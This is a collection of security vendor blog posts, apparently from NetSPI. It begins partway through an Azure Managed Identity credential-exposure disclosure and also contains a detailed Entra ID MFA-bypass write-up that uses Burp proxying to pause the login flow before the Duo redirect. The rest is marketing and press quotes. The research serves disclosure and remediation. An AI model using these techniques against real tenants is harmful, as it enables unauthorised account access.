For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.

It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, which we’ve highlighted a few options in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

  • 7/12/23 – Initial discovery of the issue and filing of the report with MSRC
  • 7/13/23 – MSRC opens Case 80917 to manage the issue
  • 8/02/23 – NetSPI requests update on status of the issue
  • 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
 
Thank you for your patience.
 
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
 
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
 
As such, this case is being closed.
 
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
  • 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
  • 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
  • 9/11/23 – Follow up email with MSRC confirms the fix is in progress
  • 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It’s unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App with this method.


Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.

Back

Gut Check: Are You Getting the Most Value out of Your Penetration Testing Report?

Not all penetration testing reports are created equal, so we summarized key sections to look for that build up to a comprehensive and actionable report. Quality vendors extend their reporting beyond a simple PDF and into custom software, such as NetSPI’s Resolve™, that aids ongoing vulnerability management. Over time, the results of penetration testing engagements can be tracked, along with their severity and remediation status for simpler insight into an enterprise’s overall security performance.  

Use this article and the penetration testing report examples below to make sure reports you receive speak to prioritized findings backed up with sound methodology. 

Need to find a quality penetration testing company? We’ve got you covered with this Penetration Testing RFP template.

The Anatomy of a Sample Penetration Testing Report

What’s the ultimate goal of a penetration testing report? According to our security consultants, penetration testing reports have three purposes:  

  1. Identify network, system, and application layer vulnerabilities that exist in a client’s environment from the perspective of an unauthenticated attacker. 
  2. Provide clients with an understanding of the potential impact vulnerabilities could have by leveraging them to gain access to critical resources.  
  3. Provide clients with a prioritized remediation approach to address the identified vulnerabilities.  

Here’s a quick rundown of what’s included in a penetration testing report.

What is a penetration testing report? Use NetSPI's penetration testing report example for what to include in a penetration test report.

Now diving into more detail on each section. 

  • Executive Summary – Project objectives, scope and timeframe, summary of results, and a summary of recommendations. 
  • Technical Detail – A list of constraints if any are present, and the approach the penetration testers took to create the results.  
  • Vulnerability Details – Relevant vulnerability findings in order of priority based on risk to the business. Clients can access a list of all the report findings at any time, but the true value comes with NetSPI’s security consultants categorizing the findings into critical, high, medium, and low severity for focused remediation efforts. 
  • Contact Information – This is a no-brainer if you want additional support or need to pass along the report to other parties for validation.  
  • Environment and Systems in Scope – A list of all assets included in testing for this specific engagement.  
  • Penetration Testing Methodology – The steps penetration testers take when undergoing an engagement, typically covering everything from information gathering on the current network architecture, to presenting the penetration testing report. 
  • Risk Management Approach Overview – Communication is key to avoid unnecessary actions that could arise when undergoing a penetration test. This section overviews the steps the penetration testing company takes to proactively avoid potential emergency reactions in response to testing activities.  
  • Security Toolkit Reference – A list of primary tools used in the engagement. Check out this roundup of the must-have Burp extensions according to our penetration testers. 
  • Revision History – Finally, you’ll find a list of the people behind the engagement who helped analyze findings to create the report alongside any dates they made changes. 

The level of detail and terminology varies from report to report, but the above sections make up a comprehensive penetration testing report.

Penetration Testing Report Examples

Want to get your hands on a sample penetration testing report? Access examples from NetSPI for reference. Be sure to bookmark these sample reports to keep them on hand when you need to compare the quality of a report you receive — or connect with our team anytime for a gut check.

Web Application Pentesting Sample Report
External Network Pentesting
AWS Cloud Pentesting

Now What? Steps to Take after Receiving a Penetration Testing Report 

Consider a penetration test to be a baseline of what you’re doing well and where you can find areas to improve. Conduct a post-mortem after a penetration test to review the findings and discuss a remediation plan with your team. Prioritize high-severity vulnerability findings, while tackling the subsequent categories over time.  

While this report is the final deliverable following a penetration test, companies that follow a Penetration Testing as a Service (PTaaS) methodology, like NetSPI, factor these key reporting components into their pentesting platforms to track performance over time. 

This leads to the growing area of continuous pentesting, which uses Attack Surface Management (ASM) to proactively monitor changes to the attack surface, paired with External Network Penetration Testing to bring a highly targeted approach to the most relevant exposures.

Whether you received your hundredth penetration test report, or you’re just starting to review your first one, benchmarking your report against NetSPI’s sample reports will give you greater context into the quality of the report in front of you. Access NetSPI’s penetration testing report examples anytime for reference.

Back

Solutions Review: Industry Experts Quotes on the United States’ Executive Order on AI

NetSPI’s EVP of Strategy Tim MalcomVetter comments on the White House Executive Order for AI in Solutions Review. Read the preview below or view the article online.

+++

The editors at Solutions Review have compiled a collection of quotes and insights from industry experts on the recent Executive Order President Joe Biden made on AI.

On October 30th, 2023, President Joe Biden and the White House made an Executive Order on the Safe, Secure, and Trustworthy Development and Use of Artificial Intelligence. As you can expect, there was a lot of discussion around the Executive Order, what it might mean for AI regulation, and how it will affect the trends involved in governing, developing, and using AI in enterprises across industries.

With that in mind, the Solutions Review editorial team compiled some commentary from industry experts worldwide, who shared their thoughts on the Executive Order and how it will change AI’s role in business.

“There has never been faster adoption of any technology than what we’ve seen with Generative AI, ML, and LLMs over the past year. A prime example of such rapid adoption and disruption is the public letter by Satya Nadella, CEO of Microsoft, where it was announced that all Microsoft products are or soon will be co-pilot enabled—this is just the starting point.

“The most recent AI Executive Order demonstrates the Biden administration wants to get ahead of this very disruptive technology for its use in the public sector and desires to protect the private sector by requiring all major technology players with widespread AI implementations to perform adversarial ML testing. The order also mandates NIST to define AI testing requirements, which is critical because no one can yet say with confidence that we, as a tech industry, exhaustively know all the ways these new AI implementations can be abused.” – Tim MalcomVetter, Executive Vice President of Strategy at NetSPI

You can read the full article at https://solutionsreview.com/business-process-management/industry-experts-quotes-on-the-united-states-executive-order-on-ai/!

Back

Elevating Your Defenses with NetSPI’s Updated Social Engineering Solutions 

Phishing remains one of the most successful ways that adversaries gain access to systems. In fact, over 48 percent of emails sent in 2022 were spam, and Google blocks approximately 100 million phishing emails every day. Because of its effectiveness, threat actors constantly develop more sophisticated, less recognizable attack methods determined to trick unsuspecting employees.

Although many companies are adding new processes, technologies, and training materials to combat this, employees continue to fall victim to phishing, vishing, and other forms of social engineering attacks.

To adjust for these current market changes, NetSPI is proud to introduce our updated Social Engineering offerings, delivering the following key benefits to our customers:

  • Modernized Adversarial Approach
    Traditional methods of social engineering testing are not as effective as they once were. As threat actors have become more sophisticated, it is critical that defense strategies adapt accordingly. Through the utilization of additional testing processes and new tooling, we are able to provide attack approaches that mimic those used by real-world adversaries today. This brings a more realistic assessment of vulnerabilities and ensures that your defenses are built to stand up against both past and present attack approaches.
  • Increased Speed & Efficiency
    Every minute counts in the security world, which is why we have implemented new processes and tooling designed to streamline and accelerate testing without compromising on accuracy and quality. A test that previously took three to five days can now be completed in two to three days. This delivers actionable results faster, enabling your team to mitigate vulnerabilities, reduce risk, and boost defenses. We know time is something security professionals do not have an abundance of, and we have updated our solutions to reflect this urgency. 
  • Additional Services & Savings
    We know that cybersecurity is not a one-size-fits-all industry, and no two environments are the same. Our updated Social Enginering solutions have expanded to offer a range of price points that cater to organizations of various sizes and needs. Every company deserves top quality defense, regardless of the budget or available bandwidth.
Automated Social Engineering for the Antisocial Engineer

NetSPI’s Social Engineering Solution Offerings 

  • Email & Text Message Testing (Phishing): Security Awareness, Account Takeover, and Spearphishing Campaign  
  • Phone-Based Testing (Vishing): Policy Check and Capture the Flag  
  • Physical & On-Site Testing: On-Site Assessment, Physical Security Controls Assessment, and Full On-Site Pentesting  

If you’re looking to strengthen internal social engineering prevention practices, NetSPI is ready to help with our proven methodology. Our updated Social Engineering Solutions provide a comprehensive, modern approach to protecting your organization with a focus on current adversarial tactics, increased testing speed and efficiency, and accessible price points.  

For further information on each of our unique Social Engineering Pentesting solutions, check out our data sheet or contact us.

Social Engineering Data Sheet

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).

Read past solutions update blogs: 

Back

insideBIGDATA: Heard on the Street – 11/2/2023

NetSPI’s Tim MalcolmVetter comments on the White House executive order on Artificial Intelligence for insideBIGDATA’s newsletter. Read the preview below or view it online.

+++

Welcome to insideBIGDATA’s “Heard on the Street” round-up column! In this regular feature, we highlight thought-leadership commentaries from members of the big data ecosystem. Each edition covers the trends of the day with compelling perspectives that can provide important insights to give you a competitive advantage in the marketplace. We invite submissions with a focus on our favored technology topics areas: big data, data science, machine learning, AI and deep learning. Enjoy!

The most recent AI Executive Order demonstrates the Biden administration wants to get ahead of this very disruptive technology for its use in the public sector and desires to protect the private sector by requiring all major technology players with widespread AI implementations to perform adversarial ML testing. The order also mandates NIST to define AI testing requirements, which is critical because no one can yet say with confidence that we, as a tech industry, exhaustively know all the ways these new AI implementations can be abused.” – Tim MalcomVetter, Executive Vice President, Strategy, NetSPI

You can read the full roundup at https://insidebigdata.com/2023/11/02/heard-on-the-street-11-2-2023/!

Back

Abusing Entra ID Misconfigurations to Bypass MFA

On a recent external assessment, I stumbled upon a method to bypass a client’s MFA requirement:  access a single-sign on (SSO) token and leverage that token to access internal applications that—by policy—should have been locked behind an MFA prompt, all without triggering an MFA alert on the end-user’s mobile device. This was possible due to a misconfiguration in the client’s Entra ID Conditional Access Policy for third-party MFA and a first-party integration with the myaccount.microsoft.com portal. 

To understand the vulnerability, there are a few things to understand about the Entra ID authentication flow. Within any Entra ID environment, there are numerous cloud applications that are leveraged when a user authenticates. The application with the misconfiguration is “My Profile” which utilizes “My Account”, “My Apps”, and “My Signins” for additional functionality within the “My Profile” portal. These separate applications are unique and can be individually configured with conditional access policies.

For this vulnerability to be present, four specific requirements must first be met: 

  1. The attacker must have valid credentials to sign into the Entra ID domain. These credentials can be brute forced through password sprays, found in online dumps, or obtained through social engineering.
  2. Entra ID must be configured to use Duo authenticator (or potentially other third-party MFA provider solutions) as the only method for MFA per the instructions on the Duo website.
  3. The “Require Duo MFA” conditional access policy must be configured for “Select Cloud Apps” rather than “All Cloud Apps” (See Image 1 Below). 
  4. The cloud application “My Profile” must not be included in the conditional access policy while other applications utilized by the “My Profile” application — like “My Account” or “My Sign-Ins” — are included.
Image 1: Require Duo MFA Conditional access policy in a vulnerable state.
Source: https://duo.com/docs/azure-ca

When these four conditions are present in an Entra ID Environment, the myaccount.microsoft.com page loads fully into the browser and provides an SSO token to the user before the conditional access policy is executed and a redirect to the Duo authenticator domain occurs to enforce the MFA authentication.

This odd load-time behavior is what alerted me to the potential for an MFA bypass. See the video below to observe how, briefly, the myaccount.microsoft.com page loads fully into the browser window before the redirect to the MFA prompt domain occurs.

Vulnerable sign-in behavior when the four requirements above are met: note the short timeframe when the page fully loads before the authenticator redirect occurs.

In order to test whether this strange behavior was due to the myaccount.microsoft.com page not respecting the conditional access policy or a misconfiguration in the conditional access policy, in the testing environment we changed one variable—Assignments: All Cloud Apps—rather than the vulnerable “Select Cloud Apps.” The results of that test can be seen below and show that the authentication process on myaccount.microsoft.com functions in a manner where the page is not loaded into the browser prior to the MFA prompt.

Expected secure sign-in behavior when three of the four requirements above are met. In this case, the conditional access policy was configured to fire on “All Cloud Apps” rather than “Select Cloud Apps”: note the myaccount.microsoft.com page does not appear before the redirect to Duo.

The exploit to bypass the misconfiguration is trivial. Using Burp Suite, or an HTTP/s proxying software of your choosing, simply proxy the traffic while authenticating to the myaccount.microsoft.com portal and manually forward packets until there is enough content loaded for you to select a new element on the page and add that to the navigation flow. If the packets are manually forwarded and a new element is selected before the authorization redirect to the Duo portal is loaded into the page, the attacker is able to navigate through the myaccount.microsoft.com portal to access internal applications and manipulate user account details such as password and MFA devices prior to authorization with MFA.

Authenticating to the myaccount.microsoft.com portal while proxying through Burp Suite and pausing the flow before the MFA Authentication redirect occurs.
Authenticating to the myaccount.microsoft.com portal while proxying through Burp Suite and demonstrating the ability to access the “update security info” page to manually edit security information for the account.

Limitations:

While this misconfiguration can lead to compromise of internal resources, there are some limitations to what it can accomplish that are all based on client-configurations within the conditional access policies. 

Since cloud-native Microsoft 365 applications are typically configured as part of the conditional access policy that requires MFA, this attack is not useful for accessing M365 resources such as Word Online, Teams, Outlook, or other Microsoft applications through the My Apps portal. Likewise, any other cloud applications that are configured to require multi-factor authentication will still be protected even when being accessed through the My Apps portal. There is also not a known method to elevate this basic token to a more robust token to access portals such as portal.office.com or entra.microsoft.com.

During testing and work with the Microsoft Security and Response Center, we examined four different Microsoft Entra ID environments. Of these four environments, only two contained the application “My Profile”. I compared licensing, where possible, and found no correlation between licensing and the existence of the “My Profile” application within the tenant.

I attempted to bypass this limitation in environments that did not contain the application by adding the application ID to the conditional access policy using the Entra ID PowerShell Modules. This was unsuccessful for the environments that didn’t list the application since it appears that those environments do not recognize the application by ID or name. 

Microsoft has been made aware of this odd behavior within the Entra Tenants and is working on a solution to address the lack of “My Profile” applications in some tenants.

Effectiveness of the attack: 

Many organizations must balance user-experience and convenience with security measures. When implementing a multi-factor authentication policy at an organization, many users do not want to approve multiple notifications just to access a single application. Many organizations will implement a structure of protecting the initial sign in or externally facing applications with MFA when being accessed from untrusted networks and leaving applications only accessible from trusted zones unsecured with MFA. 

In this example, and in real-world tests, bypassing the MFA prompt on myaccount.microsoft.com allowed the attacker to pause web application pages from loading and navigate from a non-trusted zone myaccount.microsoft.com portal to the trusted zone of myapps.microsoft.com without providing an MFA token and access business data on internal applications. 

The business logic behind the decision to not enforce MFA on these internal applications is valid, as the initial MFA prompt should have been completed before being able to access the myapps.microsoft.com portal. However, this vulnerability takes advantage of a slight delay in timing and allows the attacker access to a valid SSO token before authenticating with Duo authenticator and bypasses the business logic in place to prevent access to internal applications without MFA. 

Additionally, finding a multifactor-authentication provider that functions well with all vendors and applications leveraged by a business is nearly impossible. As MFA continues to become a business standard process and procedure across domains, multi-factor authentication providers have varying levels of support with the numerous cloud applications within a business environment. These limitations provide ample targets for attackers looking to leverage this vulnerability against Entra ID subscribers who are only applying MFA requirements through conditional access policies to specific applications either due to business-requirements or lack of support with the specific multi-factor vendor. 

Remediation:

In the environments that do have the “My Profile” Enterprise application to ensure the MFA prompt is triggered at the correct time when the user navigates to the myaccount.microsoft.com portal, the tenant administrator must configure a conditional access policy to target the “My Profile” application.

In the environments that did not include “My Profile” the only method to enforce MFA on myaccount.microsoft.com is to enforce MFA on “All Cloud Applications.” Since the “My Profile” application does not appear in all environments, the misconfiguration occurs from users believing all first-party Microsoft applications are covered by the conditional access policy. 

Conclusion: 

Although basic in its implementation and execution, finding this vulnerability was a stark reminder that although complex security systems are in use across enterprises, sometimes a simple misconfiguration can lead to compromise of secure data within the environment with minimal time investment or technical knowledge. As a penetration tester, it is easy to get bogged down in the technicalities of complex exploits and the prestige that comes along with executing a complex exploit chain. But sometimes it’s good to remember that simple misconfigurations with simple exploits can cause just as much damage to an environment and it is always good to check the basics.

Find more stories like these in our Azure Pentesting eBook.

Azure Cloud Penetration Testing Stories
Back

ITPro Today: Do You Have What It Takes to Be a CISO? Take the Personality Quiz

Nabil Hannan, NetSPI Field CISO was interviewed by ITPro Today regarding the key traits of effective CISOs. Read the preview below or view the article online.

+++

Cybersecurity professionals often have highly demanding roles in an organization. They are required to possess the necessary technical skills for managing the security infrastructure across the entire organization, while also maintaining a proactive mindset for continually evolving the security strategy. Unfortunately, due to the large responsibility they bear, they can become easy targets for blame when security incidents occur. Nevertheless, despite the stress, cybersecurity jobs remain attractive to candidates.

The position of the chief information security officer (CISO) stands out as one of the most influential and well-paying roles within an organization, attracting a diversity of talent. While strong technical skills are key, CISOs must also exhibit resilience, unwavering focus, and a strong commitment to transparency.

Interestingly, candidates with nontraditional backgrounds offer unique benefits to the cybersecurity field, specifically CISO roles. “I’ve found that individuals that have faced adversity in their life tend to make better CISOs,” noted Amit Anand, senior analyst at the Everest Group. “The challenges they have had to face tend to make them more adaptable and better at communication and collaboration.

ITPro Today spoke with CISOs and CEOs from a variety of organizations to determine traits that either nurture or hinder a CISO’s success. 

“Most CISO job descriptions focus on applicants with technical acumen but often fail to include the soft skills needed (i.e., communication, critical thinking, and leadership). For example, an essential component of the CISO role is understanding how an organization makes money and brings value to its customers. Often, threat actors will approach attacks based on where the money is. As a result, CISOs require soft skills to better make the connection between how cybersecurity fits into an organization’s broader financial picture.” – Nabil Hannan, Field CISO at NetSPI

You can read the full article at https://www.itprotoday.com/compliance-and-risk-management/do-you-have-what-it-takes-be-ciso-take-personality-quiz!